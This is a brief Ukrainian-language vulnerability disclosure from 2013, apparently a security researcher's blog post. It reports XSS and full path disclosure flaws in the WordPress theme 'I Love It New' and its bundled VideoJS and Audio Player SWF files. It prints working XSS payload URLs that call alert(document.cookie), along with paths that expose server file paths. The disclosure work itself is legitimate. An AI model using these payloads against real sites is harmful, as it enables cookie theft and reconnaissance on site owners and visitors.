XSS та FPD уразливості в темі I Love It New для WordPress
23:55 23.05.2013У травні, 16.05.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темі I Love It New для WordPress. Про що найближчим часом повідомлю розробникам.
Дана тема містить вразливі версії VideoJS та Audio Player. Раніше я писав про уразливості в VideoJS.
Cross-Site Scripting (WASC-08):
http://site/wp-content/themes/iloveitnew/videojs/videojs/video-js.swf?readyFunction=alert(document.cookie)
http://site/wp-content/themes/iloveitnew/lib/php/assets/player.swf?playerID=%22))}catch(e){alert(document.cookie)}//
Full path disclosure (WASC-13):
FPD уразливості є в index.php та майже в усіх інших php-файлах (в папці та підпапках).
http://site/wp-content/themes/iloveitnew/
http://site/wp-content/themes/iloveitnew/videojs/video-js.php
http://site/wp-content/themes/iloveitnew/videojs/admin.php
Вразливі всі версії теми I Love It New для WordPress.